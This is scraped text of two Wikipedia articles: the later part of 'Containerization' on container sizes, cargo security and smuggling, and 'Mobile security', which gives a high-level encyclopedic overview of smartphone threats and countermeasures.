but he did not anticipate that containerization might make it cheaper to import such goods from abroad. Most economic studies of containerization merely assumed that shipping companies would begin to replace older forms of transportation with containerization, but did not predict that the process of containerization itself would have a more direct influence on the choice of producers and increase the total volume of trade.[4] The widespread use of ISO standard containers has driven modifications in other freight-moving standards, gradually forcing removable truck bodies orswap bodiesinto standard sizes and shapes (though without the strength needed to be stacked), and changing completely the worldwide use of freightpalletsthat fit into ISO containers or into commercial vehicles. Improved cargo security is an important benefit of containerization. Once the cargo is loaded into a container, it is not touched again until it reaches its destination.[54]The cargo is not visible to casual viewers, and thus is less likely to be stolen. Container doors are usually sealed so that tampering is more evident. Some containers are fitted with electronic monitoring devices and can be remotely monitored for changes in air pressure, which happens when the doors are opened. This reduced thefts that had long plagued the shipping industry. Recent developments have focused on the use of intelligent logistics optimization to further enhance security. The use of the same basic sizes of containers across the globe has lessened the problems caused by incompatiblerail gaugesizes. The majority of the rail networks in the world operate on a1,435 mm(4 ft8+1⁄2in) gauge track known asstandard gauge, but some countries (such as Russia, India, Finland, and Lithuania) usebroader gauges, while others in Africa and South America usenarrower gauges. The use of container trains in all these countries makes transshipment between trains of different gauges easier. Containers have become a popular way toship private cars and other vehiclesoverseas using 20- or 40-foot containers. Unlikeroll-on/roll-offvehicle shipping, personal effects can be loaded into the container with the vehicle, allowing easy international relocation.[citation needed] In July, 2020, The Digital Container Shipping Association (DCSA), a non-profit group established to further digitalisation of container shipping technology standards, published standards for the digital exchange of operational vessel schedules (OVS).[55] Contrary to ocean shipping containers owned by the shippers, a persisting trend in the industry is for (new) units to be purchased by leasing companies. Leasing business accounted for 55% of new container purchases in 2017, with their box fleet growing at 6.7%, compared to units of transport operators growing by just 2.4% more TEU, said global shipping consultancy Drewry in their 'Container Census & Leasing and Equipment Insight', leading to a leased share of the global ocean container fleet reaching 54% by 2020.[56] In 2021, the average time to unload a container in Asia was 27 seconds, the average time in Northern Europe was 46 seconds, and the average time in North America was 76 seconds.[57] There are five common standard lengths: US domestic standard containers are generally 48 ft (14.63 m) and 53 ft (16.15 m) (rail and truck). Container capacity is often expressed intwenty-foot equivalent units(TEU, or sometimesteu). An equivalent unit is a measure of containerized cargo capacity equal to one standard 20 ft (6.10 m) (length) × 8 ft (2.44 m) (width) container. As this is an approximate measure, the height of the box is not considered. For instance, the 9 ft 6 in (2.90 m)high cubeand the 4 ft 3 in (1.30 m)half height20 ft (6.10 m) containers are also called one TEU. 48' containers have been phased out over the last ten years[when?]in favor of 53' containers. The maximum gross mass for a 20 ft (6.10 m) dry cargo container was initially set at 24,000 kg (53,000 lb), and 30,480 kg (67,200 lb)for a 40 ft (12.19 m) container (including the 9 ft 6 in or 2.90 m high cube) . Allowing for thetare massof the container, the maximum payload mass is therefore reduced to approximately 22,000 kg (49,000 lb) for 20 ft (6.10 m), and 27,000 kg (60,000 lb) for 40 ft (12.19 m) containers.[58] It was increased to 30,480 kg for the 20' in 2005, then further increased to a max of 36,000 kg for all sizes by the amendment 2 (2016) of the ISO standard 668 (2013). The original choice of 8-foot (2.44 m) height for ISO containers was made in part to suit a large proportion of railway tunnels, though some had to be modified. The current standard is eight feet six inches (2.59 m) high. With the arrival of even taller hi-cube containers at nine feet six inches (2.90 m) anddouble stackingrail cars, further enlargement of the railloading gaugeis proving necessary.[59] While major airlines use containers that are custom designed for their aircraft and associated ground handling equipment theIATAhas created a set of standard aluminium container sizes of up to 11.52 m3(407 cu ft) in volume. Some other container systems (in date order) are: A full container load (FCL)[77]is anISO standardcontainer that is loaded and unloaded under the risk and account of one shipper and one consignee. In practice, it means that the whole container is intended for one consignee. FCL container shipment tends to have lowerfreight ratesthan an equivalent weight ofcargoin bulk. FCL is intended to designate a container loaded to its allowable maximum weight or volume, but FCL in practice onocean freightdoes not always mean a full payload or capacity – many companies will prefer to keep a 'mostly' full container as a single container load to simplify logistics and increase security compared to sharing a container with other goods. Less-than-container load (LCL) is ashipmentthat is not large enough to fill a standardcargo container. The abbreviation LCL formerly applied to "less than (railway) car load" for quantities of material from different shippers or for delivery to different destinations carried in a singlerailway carfor efficiency. LCL freight was often sorted and redistributed into different railway cars at intermediaterailway terminalsen route to the final destination.[78] Groupageis the process of filling a container with multiple shipments for efficiency.[79] LCL is "a quantity ofcargoless than that required for the application of a carload rate. A quantity of cargo less than that which fills the visible or rated capacity of an inter-modal container."[citation needed]It can also be defined as "a consignment of cargo which is inefficient to fill a shipping container. It is grouped with other consignments for the same destination in a container at a containerfreight station".[80] Containers are actively used for smuggling and trafficking illicit goods and people. Drugs, antiques, weapons, undeclared merchandise, jewellery, human beings, wildlife, counterfeit products, as well as chemical, radioactive and biological materials, are illegally transported via containers.[81][82][83][84][85][86]Additionally, there are concerns about terrorists using containers to transport weapons of mass destruction (WMD).[87]However, these concerns remain hypothetical.[88] There are several ways in which illicit goods are smuggled. One method involves forging documents to make a container appear as legal cargo.[81][89]Another method is inserting illegal goods into a legitimate shipment, mixing legal and illegal items together.[90][81]For example, in 2024, several shipments of drugs, either disguised as banana cargo or mixed with legal banana shipments, were discovered in Germany, Greece, Spain and Great Britain.[91][92][93][94]Criminal groups use legitimate fruit businesses as fronts for their narcotics operations, making fruit cargo a common method for concealing drugs.[95]Trafficking in wildlife parts, such as ivory, frequently involves altering the appearance of the goods. For instance, ivory has been known to be cut into the shape of chocolate bars or painted the colour of wood to avoid detection during X-ray inspections.[96]Additionally, containers can be physically modified to hide illegal parcels, such as through the use of fake walls, secret compartments, hollowed-out rails, support beams and doors.[90] The lack of capacity at ports to inspect containers increases the likelihood of smuggled goods going undetected. In African ports, especially West Africa, where most drug routes converge, only about 2% of all containers are inspected.[81][97]Similarly, European ports check just 2–10% of incoming containers, leaving the majority unscreened and creating opportunities for trafficking.[81][98] Nevertheless, there are a number of security measures in place, notably theContainer Security Initiative(CSI), a post-9/11 US-led programme. This initiative aims to pre-screen high-risk cargo before it reaches US territory. One of its primary goals is to prevent the smuggling of weapons of mass destruction (WMD).[99][100] Although the programme was initiated by the United States, by 2007, some 20 countries had signed a Memorandum of Understanding with the US, leading to the implementation of CSI measures at 58 ports around the world. The CSI system includes non-intrusive pre-screening methods, such as X-ray and radiation screening, for high-risk cargo destined for the United States. As a result, more than 80% of containerised cargo bound for the United States is pre-screened.[99][100] Containers are intended to be used constantly, being loaded with new cargo for a new destination soon after emptied of previous cargo. This is not always possible, and in some cases, the cost of transporting an empty container to a place where it can be used is considered to be higher than the worth of the used container.Shipping linesand container leasing companies have become expert at repositioning empty containers from areas of low or no demand, such as the US West Coast, to areas of high demand, such as China. Repositioning within the port hinterland has also been the focus of recent logistics optimization work. Damaged or retired containers may be recycled in the form ofshipping container architecture, or the steel content salvaged. In the summer of 2010, a worldwide shortage of containers developed as shipping increased after the recession, while new container production had largely ceased.[101] Containers occasionally fall from ships, usually during storms. According to media sources, between 2,000[102]and 10,000 containers are lost at sea each year.[103]TheWorld Shipping Councilstates in a survey among freight companies that this claim is grossly excessive and calculated an average of 350 containers to be lost at sea each year, or 675 if including catastrophic events.[104]For instance, on November 30, 2006, a container washed ashore[105]on the Outer Banks ofNorth Carolina, along with thousands of bags of its cargo ofDoritos Chips. Containers lost in rough waters are smashed by cargo and waves, and often sink quickly.[102]Although not all containers sink, they seldom float very high out of the water, making them a shipping hazard that is difficult to detect. Freight from lost containers has providedoceanographerswith unexpected opportunities to track globalocean currents, notably a cargo ofFriendly Floatees.[106] In 2007 theInternational Chamber of Shippingand theWorld Shipping Councilbegan work on a code of practice for container storage, including crew training onparametric rolling, safer stacking, the marking of containers, and security for above-deck cargo in heavy swell.[107][108] In 2011, theMV Renaran aground off the coast of New Zealand. As the ship listed, some containers were lost, while others were held on board at a precarious angle. Some of the biggest battles in the container revolution were waged in Washington, D.C.. Intermodal shipping got a huge boost in the early 1970s, when carriers won permission to quote combined rail-ocean rates. Later, non-vessel-operatingcommon carrierswon a long court battle with a US Supreme Court decision against contracts that attempted to require that union labor be used for stuffing and stripping containers at off-pier locations.[109] Containers are ofteninfestedwithpests.[110][111]Pestintroductionsare significantly clustered around ports, and containers are a common source of such successful pest transfers.[110][111]The IPPCSea Container Task Force(SCTF) promulgates theCargo Transport Units Code(CTU), prescribedpesticidesand other standards (see§ Other container system standards) and recommendations for use in container decontamination, inspection and quarantine.[76]The SCTF also provides the English translation of the National Standard of China (GB/T 39919-2021).[76] Shipping container architectureis the use of containers as the basis for housing and other functional buildings for people, either as temporary or a permanent housing, and either as a main building or as a cabin or as a workshop. Containers can also be used as sheds or storage areas in industry and commerce. Tempo Housing in Amsterdam stacks containers for individual housing units. Containers are also beginning to be used to house computer data centers, although these are normally specialized containers. There is now a high demand for containers to be converted in the domestic market to serve specific purposes.[112]As a result, a number of container-specific accessories have become available for a variety of applications, such as racking for archiving, lining, heating, lighting, powerpoints to create purpose-built secure offices, canteens and drying rooms, condensation control for furniture storage, and ramps for storage of heavier objects. Containers are also converted to provide equipment enclosures, pop-up cafes, exhibition stands, security huts and more. Public containerised transport[113]is the concept, not yet implemented, of modifying motor vehicles to serve as personal containers in non-road passenger transport. The ACTS roller container standards have become the basis ofcontainerized firefighting equipmentthroughout Europe. Containers have also been used for weapon systems, such as the RussianClub-K, which allow the conversion of an ordinary container system into a missile boat, capable of attacking surface and ground targets, and the CWS (Containerized Weapon System)[114]developed for the US Army that allow for the rapid deployment of a remote controlled machine gun post from a container. On September 5, 2008, the BBC embarked on a year-long project to study international trade andglobalizationby tracking a shipping container on its journey around the world.[115][116]
https://en.wikipedia.org/wiki/Containerization
Mobile security, ormobile device security, is the protection ofsmartphones, tablets, andlaptopsfrom threats associated withwireless computing.[1]It has become increasingly important inmobile computing. Thesecurityof personal and business information now stored onsmartphonesis of particular concern.[2] Increasingly, users and businesses use smartphones not only to communicate, but also to plan and organize their work and private life. Within companies, these technologies are causing profound changes in the organization ofinformation systemsand have therefore become the source of new risks. Indeed, smartphones collect and compile an increasing amount of sensitive information to which access must be controlled to protect theprivacyof theuserand theintellectual propertyof the company. The majority of attacks are aimed at smartphones.[citation needed]These attacks take advantage of vulnerabilities discovered in smartphones that can result from different modes of communication, includingShort Message Service(SMS, text messaging),Multimedia Messaging Service(MMS),wireless connections,Bluetooth, andGSM, the de facto international standard for mobile communications. Smartphone operating systems or browsers are another weakness. Somemalwaremakes use of the common user's limited knowledge. Only 2.1% of users reported having first-hand contact withmobile malware, according to a 2008 McAfee study, which found that 11.6% of users had heard of someone else being harmed by the problem. Yet, it is predicted that this number will rise.[3]As of December 2023, there were about 5.4 million global mobile cyberattacks per month. This is a 147% increase from the previous year.[4] Securitycountermeasuresare being developed and applied to smartphones, from security best practices in software to the dissemination of information to end users. Countermeasures can be implemented at all levels, includingoperating systemdevelopment, software design, and user behavior modifications. A smartphone user is exposed to various threats when they use their phone. In just the last two quarters of 2012, the number of unique mobile threats grew by 261%, according toABI Research.[3]These threats can disrupt the operation of the smartphone and transmit or modify user data. Applications must guarantee privacy and integrity of the information they handle. In addition, since some apps could themselves be malware, their functionality and activities should be limited (for example, restricting the apps from accessing location information via theGlobal Positioning System(GPS), blocking access to the user's address book, preventing the transmission of data on the network, or sending SMS messages that are billed to the user).[1]Malicious apps can also beinstalledwithout the owners' permission or knowledge. Vulnerabilityin mobile devices refers to aspects of system security that are susceptible to attacks. A vulnerability occurs when there is system weakness, an attacker has access to the weakness, and the attacker has competency to exploit the weakness.[1] Potential attackers began looking for vulnerabilities when Apple'siPhoneand the firstAndroiddevices came onto the market. Since the introduction of apps (particularly mobile banking apps), which are vital targets for hackers,malwarehas been rampant. The Department of Homeland Security'scybersecuritydepartment claims that the number of vulnerable points in smartphone operating systems has increased.[when?]As mobile phones are connected to utilities and appliances,hackers,cybercriminals, and even intelligence officials have access to these devices.[5] Starting in 2011, it became increasingly popular to let employees use their own devices for work-related purposes. The Crowd Research Partners study, published in 2017, reports that during 2017, most businesses that mandated the use of mobile devices were subjected to malware attacks and breaches. It has become common for rogue applications to be installed on user devices without the user's permission. They breach privacy, which hinders the effectiveness of the devices.[citation needed][clarification needed] Since the recent rise of mobile attacks, hackers have increasingly targeted smartphones through credential theft and snooping. The number of attacks targeting smartphones and other devices has risen by 50 percent.[citation needed]According to the study,[which?]mobile bankingapplications are responsible for the increase in attacks. Malware—such asransomware,worms,botnets,Trojans, andviruses—have been developed to exploit vulnerabilities in mobile devices. Malware is distributed by attackers so they can gain access to private information or digitally harm a user. For example, should malware breach a user's banking service, it may be able to access their transaction information, their rights tolog in, and their money. Some malware is developed with anti-detection techniques to avoid detection. Attackers who use malware can avoid detection by hidingmalicious code. Trojan-droppers can also avoid detection of malware. Despite the fact that the malware inside a device does not change, the dropper generates newhasheseach time. Additionally, droppers can also create a multitude of files, which can lead to the creation of viruses. Android mobile devices are prone to Trojan-droppers. The banking Trojans also enable attacks on the banking applications on the phone, which leads to the theft of data for use in stealing money and funds.[clarification needed] JailbreaksforiOSdevices work by disabling the signing of codes on iPhones so that applications not downloaded from the App Store can be operated. In this way, all the protection layers offered by iOS are disrupted, exposing the device to malware. These outside applications don't run in asandbox, which exposes potential security problems. Some attack vectors change the mobile devices' configuration settings by installing malicious credentials andvirtual private networks(VPNs) to direct information to malicious systems. In addition,spywarecan be installed on mobile devices in order to track an individual. Triade malware comes pre-installed on some mobile devices. In addition to Haddad, there is Lotoor, which exploits vulnerabilities in the system to repackage legitimate applications.[6]The devices are also vulnerable due to spyware and leaky behaviors through applications. Mobile devices are also effective conveyance systems for malware threats, breaches of information, and thefts. Wi-Fi interference technologies can also attack mobile devices through potentially insecure networks. By compromising the network, hackers are able to gain access to key data. Devices connected to public networks are at risk of attacks. A VPN, on the other hand, can be used to secure networks. As soon as a system is threatened, an active VPN will operate. There are also social engineering techniques, such asphishing, in which unsuspecting victims are sent links to lead them to malicious websites. The attackers can then hack into the victim's device and copy all of its information. Some mobile device attacks can be prevented. For example, containerization allows the creation of a hardware infrastructure that separates business data from other data. Additionally, network protection detects malicious traffic and rogue access points. Data security is also ensured through authentication.[1] There are a number of threats to mobile devices, including annoyance, stealing money, invading privacy, propagation, and malicious tools.[7]There are three prime targets for attackers:[8] Attacks on mobile security systems include: The source of these attacks are the same actors found in the non-mobile computing space:[8] When a smartphone is infected by an attacker, the attacker can attempt several things: Some attacks derive from flaws in the management ofShort Message Service(SMS) andMultimedia Messaging Service(MMS). Some mobile phone models have problems in managingbinarySMS messages. By sending an ill-formed block, it is possible to cause the phone to restart, leading to the denial-of-service attacks. If a user with aSiemens S55received a text message containing aChinese character, it would lead to a denial of service.[18]In another case, while the standard requires that the maximum size of a Nokia Mail address is 32 characters, someNokiaphones did not verify this standard, so if a user enters an email address over 32 characters, that leads to complete dysfunction of the e-mail handler and puts it out of commission. This attack is called "curse of silence". A study on the safety of the SMS infrastructure revealed that SMS messages sent from theInternetcan be used to perform adistributed denial of service(DDoS) attack against themobile telecommunicationsinfrastructure of a big city. The attack exploits the delays in the delivery of messages to overload the network. Another potential attack could begin with a phone that sends an MMS to other phones, with an attachment. This attachment is infected with a virus. Upon receipt of the MMS, the user can choose to open the attachment. If it is opened, the phone is infected, and the virus sends an MMS with an infected attachment to all the contacts in the address book. There is a real-world example of this attack: the virusCommwarrior[17]sends MMS messages (including an infected file) to all recipients in a mobile phone's address book. If a recipient installs the infected file, the virus repeats, sending messages to recipients taken from the new address book. The attacker may try to break theencryptionof aGSM mobile network. The network encryption algorithms belong to the family of algorithms calledA5. Due to the policy ofsecurity through obscurity, it has not been possible to openly test the robustness of these algorithms. There were originally two variants of the algorithm:A5/1andA5/2(stream ciphers), where the former was designed to be relatively strong, and the latter was purposely designed to be weak to allow easycryptanalysisand eavesdropping.ETSIforced some countries (typically outside Europe) to use A5/2. Since the encryption algorithm was made public, it was proved to be breakable: A5/2 could be broken on the fly, and A5/1 in about 6 hours.[19]In July 2007, the3GPPapproved a change request to prohibit the implementation of A5/2 in any new mobile phones, decommissioning the algorithm; it is no longer implemented in mobile phones. Stronger public algorithms have been added to the GSM standard: the A5/3 and A5/4 (Block ciphers), otherwise known asKASUMI or UEA1[20]published by ETSI. If the network does not support A5/1, or any other A5 algorithm implemented by the phone, then the base station can specify A5/0 which is the null algorithm, whereby the radio traffic is sent unencrypted. Even if mobile phones are able to use3Gor4G(which have much stronger encryption than 2G GSM), the base station can downgrade the radio communication to 2G GSM and specify A5/0 (no encryption).[21]This is the basis for eavesdropping attacks on mobile radio networks using a fake base station commonly called anIMSI catcher. In addition, tracing of mobile terminals is difficult since each time the mobile terminal is accessing or being accessed by the network, a new temporary identity (TMSI) is allocated to the mobile terminal. The TMSI is used as the identity of the mobile terminal the next time it accesses the network. The TMSI is sent to the mobile terminal in encrypted messages.[citation needed] Once the encryption algorithm of GSM is broken, the attacker can intercept all unencrypted communications made by the victim's smartphone. An attacker can try to eavesdrop on Wi-Fi communications to derive information (e.g., username, password). This type of attack is not unique to smartphones, but they are very vulnerable to these attacks because often Wi-Fi is their only means of communication and access the internet. The security of wireless networks (WLAN) is thus an important subject. Initially, wireless networks were secured byWEPkeys. The weakness of WEP is its short encryption key, which is the same for all connected clients. In addition, several reductions in the search space of the keys have been found by researchers. Now, most wireless networks are protected by theWPAsecurity protocol. WPA is based on theTemporal Key Integrity Protocol(TKIP), which was designed to allow migration from WEP to WPA on the equipment already deployed. The major improvements in security are thedynamic encryptionkeys. For small networks, the WPA uses a "pre-shared key" which is based on a shared key. Encryption can be vulnerable if the length of the shared key is short. With limited opportunities for input (i.e., only the numeric keypad), mobile phone users might define short encryption keys that contain only numbers. This increases the likelihood that an attacker succeeds with a brute-force attack. The successor to WPA, calledWPA2, is supposed to be safe enough to withstand a brute force attack. The ability to access free and fast Wi-Fi gives a business an edge over those who do not. Free Wi-Fi is usually provided by organizations such as airports, coffee shops, and restaurants for a number of reasons, including encouraging customers to spend more time and money on the premises, and helping users stay productive.[1]Another reason is enhancing customer tracking: many restaurants and coffee shops compile data about their customers so they can target advertisements directly to their devices.[citation needed]This means that customers know what services the facility provides. Generally, individuals filter business premises based on Internet connections as another reason to gain a competitive edge. Network security is the responsibility of the organizations, as unsecured Wi-Fi networks are prone to numerous risks. The man-in-the-middle attack entails the interception and modification of data between parties. Additionally, malware can be distributed via the free Wi-Fi network and hackers can exploit software vulnerabilities to smuggle malware onto connected devices. It is also possible to eavesdrop and sniff Wi-Fi signals using special software and devices, capturing login credentials and hijacking accounts.[10] As with GSM, if the attacker succeeds in breaking the identification key, both the phone and the entire network it is connected to become exposed to attacks. Many smartphones remember wireless LANs they have previously connected to, allowing users to not have to re-identify with each connection. However, an attacker could create a Wi-Fi access point twin with the same parameters and characteristics as a real network. By automatically connecting to the fraudulent network, a smartphone becomes susceptible to the attacker, who can intercept any unencrypted data.[22] Lasco is a worm that initially infects a remote device using theSIS file format,[23]a type of script file that can be executed by the system without user interaction. The smartphone thus believes the file to come from a trusted source and downloads it, infecting the machine.[23] Security issues related to Bluetooth on mobile devices have been studied and have shown numerous problems on different phones. One easy to exploitvulnerabilityis that unregistered services do not require authentication, and vulnerable applications have avirtual serial portused to control the phone. An attacker only needed to connect to the port to take full control of the device.[24] In another example, an attacker sends a file via Bluetooth to a phone within range with Bluetooth in discovery mode. If the recipient accepts, a virus is transmitted. An example of this is a worm called Cabir.[17]The worm searches for nearby phones with Bluetooth in discoverable mode and sends itself to the target device. The user must accept the incoming file and install the program, after which the worm infects the machine. Other attacks are based on flaws in the OS or applications on the phone. Themobile web browseris an emerging attack vector for mobile devices. Just as common Web browsers, mobile web browsers are extended from pure web navigation with widgets and plug-ins or are completely native mobile browsers. Jailbreakingthe iPhone with firmware 1.1.1 was based entirely on vulnerabilities on the web browser.[25]In this case, there was a vulnerability based on astack-based buffer overflowin a library used by the web browser (LibTIFF). A similar vulnerability in the web browser for Android was discovered in October 2008.[26]Like the iPhone vulnerability, it was due to an obsolete and vulnerablelibrary, but significantly differed in that Android's sandboxing architecture limited the effects of this vulnerability to the Web browser process. Smartphones are also victims of classic Webpiracysuch as phishing, malicious websites, and background-running software. The big difference is that smartphones do not yet have strongantivirus softwareavailable.[27][failed verification] The Internet offers numerous interactive features that ensure a higher engagement rate, capture more and relevant data, and increase brand loyalty. Blogs, forums, social networks, andwikisare some of the most common interactive websites. Due to the tremendous growth of the Internet, there has been a rapid rise in the number of security breaches experienced by individuals and businesses. Mobile browser users can balance usage and caution in several ways,[28]such as reviewing computer security regularly, using secure and secret passwords, and correcting, upgrading, and replacing the necessary features. Installation ofantivirusand anti-spyware programs is the most effective way of protecting the computer, as they offer protection against malware, spyware, and viruses. Additionally, they usefirewalls, which are typically installed between trusted networks or devices and the Internet. By acting as a web server, the firewall prevents external users from accessing the internal computer system.[29][failed verification] Sometimes it is possible to overcome the security safeguards by modifying theoperating system(OS) itself, such as the manipulation offirmwareand malicious signature certificates. These attacks are difficult. In 2004, vulnerabilities invirtual machinesrunning on certain devices were revealed. It was possible to bypass thebytecodeverifier and access the native underlying operating system.[3]The results of this research were not published in detail. The firmware security of Nokia'sSymbianPlatform Security Architecture (PSA) is based on a central configuration file called SWIPolicy. In 2008, it was possible to manipulate the Nokia firmware before it was installed. In fact, some downloadable versions of this file were human-readable, so it was possible to modify and change the image of the firmware.[30]This vulnerability was solved by an update from Nokia. In theory, smartphones have an advantage over hard drives since the OS files are inread-only memory(ROM) and cannot be changed by malware. However, in some systems it was possible to circumvent this: in theSymbian OS, it was possible to overwrite a file with a file of the same name.[30]On the Windows OS, it was possible to change a pointer from a general configuration file to an editable file. When an application is installed, thesigningof this application is verified by a series ofcertificates. One can create a validsignaturewithout using a valid certificate and add it to the list.[31]In the Symbian OS, all certificates are in the directoryc:\resource\swicertstore\dat. With firmware changes explained above, it is very easy to insert a seemingly valid but malicious certificate. Androidis the OS that has been attacked the most, because it has the largest userbase. A cybersecurity company[which?]reported to have blocked about 18 million attacks in 2016.[32] In 2015, researchers at the French government agencyAgence nationale de la sécurité des systèmes d'information(ANSSI,lit.'French National Agency for the Security of Information Systems') demonstrated the capability to trigger the voice interface of certain smartphones remotely by using "specificelectromagneticwaveforms".[5]The exploit took advantage of antenna-properties of headphone wires while plugged into the audio-output jacks of the vulnerable smartphones and effectively spoofed audio input to inject commands via the audio interface.[5] Juice jacking is a physical or hardware vulnerability specific to mobile platforms. Utilizing the dual purpose of the USB charge port, many devices have been susceptible to having data exfiltrated from, or malware installed onto, a mobile device by utilizing malicious chargingkiosksset up in public places or hidden in normal charge adapters. Jailbreaking is also a physical access vulnerability, in which a mobile device user hacks into device to unlock it, exploiting weaknesses in the operating system. Mobile device users take control of their own device by jailbreaking it, allowing them to customize the interface by installing applications, changesystem settingsthat are not allowed on the devices, tweak OS processes, and run uncertified programs. This openness exposes the device to a variety of malicious attacks which can compromise private data.[6] In 2010, researchers from the University of Pennsylvania investigated the possibility ofcracking a device's passwordthrough asmudge attack(literally imaging the finger smudges on the screen to discern the user's password).[28]The researchers were able to discern the device password up to 68% of the time under certain conditions.[28]Outsiders may perform over-the-shoulder surveillance on victims, such as watching specific keystrokes or pattern gestures, to unlock device password or passcode. As smartphones are a permanent point of access to the Internet (they are often turned on), they can be compromised with malware as easily as computers. Amalwareis a computer program that aims to harm the system in which it resides. Trojans,wormsandvirusesare all considered malware. A Trojan is a program on a device that allows external users to connect discreetly. A worm is a program that reproduces on multiple computers across a network. A virus is a malicious software designed to spread to other computers by inserting itself into legitimate programs and running programs in parallel. Malware is far less numerous and serious to smartphones as it is to computers. Nonetheless, recent studies show that the evolution of malware in smartphones have rocketed in the last few years posing a threat to analysis and detection.[26]In 2017, mobile malware variants increased by 54%.[34] Various common apps installed by millions can intrude on privacy, even if they were installed from a trusted software distribution service like theGoogle Play Store. For example, in 2022 it was shown that the popular appTikTokcollects a lot of data and is required to make it available to theChinese Communist Party(CCP) due to a national security law. This includes personal information on millions of Americans. The firmware and "stock software" preinstalled on devices – and updated with preinstalled software – can also have undesired components or privacy-intruding default configurations or substantial security vulnerabilities. In 2019,Kryptowireidentified Android devices with malicious firmware that collected and transmitted sensitive data without users' consent. Analysis of data traffic by popular smartphones running variants of Android found substantial by-default data collection and sharing with no opt-out bypre-installed software.[35][36]This issue also can't be addressed by conventional security patches. Outgoing Internet traffic can be analyzed withpacket analyzersand with firewall apps like theNetGuardfirewall app for Android that allows reading blocked traffic logs.[37][additional citation(s) needed] Typically, an attack on a smartphone made by malware takes place in three phases: the infection of a host, the accomplishment of its goal, and the spread of the malware to other systems. Malware often uses the resources offered by infected smartphones. It will use the output devices such as Bluetooth orinfrared, but it may also use the address book or email address of the person to infect the user's acquaintances. The malware exploits the trust that is given to data sent by an acquaintance. Infection is the method used by malware to gain access to the smartphone; it may exploit an internal vulnerability or rely on the gullibility of the user. Infections are classified into four classes according to their degree of user interaction:[38] Accomplishment of its goal Once the malware has infected a phone, it will also seek to accomplish its goal, which is usually one of the following:[39] Once the malware has infected a smartphone, it aims to spread to a new host.[40]This usually occurs to proximate devices via Wi-Fi, Bluetooth, or infrared; or to remote networks via telephone calls, SMS, or emails. Mobile ransomware is a type of malware that locks users out of their mobile devices in a pay-to-unlock-your-device ploy. It has significantly grown as a threat category since 2014.[43]Mobile users are often less security-conscious – particularly as it pertains to scrutinizing applications and web links – and trust the mobile device's native protection capability. Mobile ransomware poses a significant threat to businesses reliant on instant access and availability of their proprietary information and contacts. The likelihood of a traveling businessman paying a ransom to unlock their device is significantly higher since they are at a disadvantage given inconveniences such as timeliness and less direct access to IT staff. Recent ransomware attacks have caused many Internet-connected devices to not work and are costly for companies to recover from. Attackers can make their malware target multiple platforms. Some malware attacks operating systems but is able to spread across different systems. To begin with, malware can use runtime environments likeJava virtual machineor the.NET Framework. They can also use other libraries present in many operating systems.[45]Some malware carries several executable files in order to run in multiple environments, utilizing these during the propagation process. In practice, this type of malware requires a connection between the two operating systems to use as an attack vector. Memory cards can be used for this purpose, or synchronization software can be used to propagate the virus. Mobile security is divided into different categories, as methods do not all act at the same level and are designed to prevent different threats. These methods range from the management of security by the operating system (protecting the system from corruption by an application) to the behavioral education of the user (preventing the installation of a suspicious software). The first layer of security in a smartphone is theoperating system. Beyond needing to handle the usual roles (e.g.,resource management, scheduling processes) on the device, it must also establish the protocols for introducing external applications and data without introducing risk.[citation needed] A central paradigm in mobile operating systems is the idea of asandbox. Since smartphones are currently designed to accommodate many applications, they must have mechanisms to ensure these applications are safe for the phone itself, for other applications and data on the system, and for the user. If a malicious program reaches a mobile device, the vulnerable area presented by the system must be as small as possible. Sandboxing extends this idea to compartmentalize different processes, preventing them from interacting and damaging each other. Based on the history of operating systems, sandboxing has different implementations. For example, whereiOSwill focus on limiting access to its public API for applications from the App Store by default, Managed Open In allows you to restrict which apps can access which types of data. Android bases its sandboxing on its legacy ofLinuxandTrustedBSD. The following points highlight mechanisms implemented in operating systems, especially Android. Above the operating system security, there is a layer of security software. This layer is composed of individual components to strengthen various vulnerabilities: prevent malware, intrusions, the identification of a user as a human, and user authentication. It contains software components that have learned from their experience with computer security; however, on smartphones, this software must deal with greater constraints (seelimitations). Should a malicious application pass the security barriers, it can take the actions for which it was designed. However, this activity can be sometimes detected by monitoring the various resources used on the phone. Depending on the goals of the malware, the consequences of infection are not always the same; all malicious applications are not intended to harm the devices on which they are deployed.[62] The following resources are only indications and do not provide certainty about the legitimacy of the activity of an application. However, these criteria can help target suspicious applications, especially if several criteria are combined. Network trafficexchanged by phones can be monitored. One can place safeguards in network routing points in order to detect abnormal behavior. As the mobile's use of network protocols is much more constrained than that of a computer, expected network data streams can be predicted (e.g., the protocol for sending an SMS), which permits detection of anomalies in mobile networks.[64] In the production and distribution chain for mobile devices, manufacturers are responsibility for ensuring that devices are delivered in a basic configuration without vulnerabilities. Most users are not experts and many of them are not aware of the existence of security vulnerabilities, so the device configuration as provided by manufacturers will be retained by many users. Some smartphone manufacturers addTitan M2s(a security hardware chip) to increase mobile security.[65][66] The user has a large responsibility in the cycle of security. This can be as simple as using a password, or as detailed as precisely controlling which permissions are granted to applications. This precaution is especially important if the user is an employee of a company who stores business data on the device. Much malicious behavior is allowed by user carelessness. Smartphone users were found to ignore security messages during application installation, especially during application selection and checking application reputation, reviews, security, and agreement messages.[73]A recent survey byinternet securityexperts BullGuard showed a lack of insight concerning the rising number of malicious threats affecting mobile phones, with 53% of users claiming that they are unaware of security software for smartphones. A further 21% argued that such protection was unnecessary, and 42% admitted it hadn't crossed their mind ("Using APA," 2011).[full citation needed]These statistics show that consumers are not concerned about security risks because they believe it is not a serious problem. However, in truth, smartphones are effectively handheld computers and are just as vulnerable. The following are precautions that a user can take to manage security on a smartphone: These precautions reduce the ability for people or malicious applications to exploit a user's smartphone. If users are careful, many attacks can be defeated, especially phishing and applications seeking only to obtain rights on a device. One form of mobile protection allows companies to control the delivery and storage of text messages, by hosting the messages on a company server, rather than on the sender or receiver's phone. When certain conditions are met, such as an expiration date, the messages are deleted.[80] The security mechanisms mentioned in this article are to a large extent inherited from knowledge and experience with computer security. The elements composing the two device types are similar, and there are common measures that can be used, such as antivirus software and firewalls. However, the implementation of these solutions is not necessarily possible (or is at least highly constrained) within a mobile device. The reason for this difference is the technical resources available to computers and mobile devices: even though the computing power of smartphones is becoming faster, they have other limitations: Furthermore, it is common that even if updates exist, or can be developed, they are not always deployed. For example, a user may not be aware of operating system updates; or a user may discover known vulnerabilities that are not corrected until the end of a long development cycle, which allows time to exploit the loopholes.[68] The following mobile environments are expected to make up future security frameworks:
https://en.wikipedia.org/wiki/Mobile_security
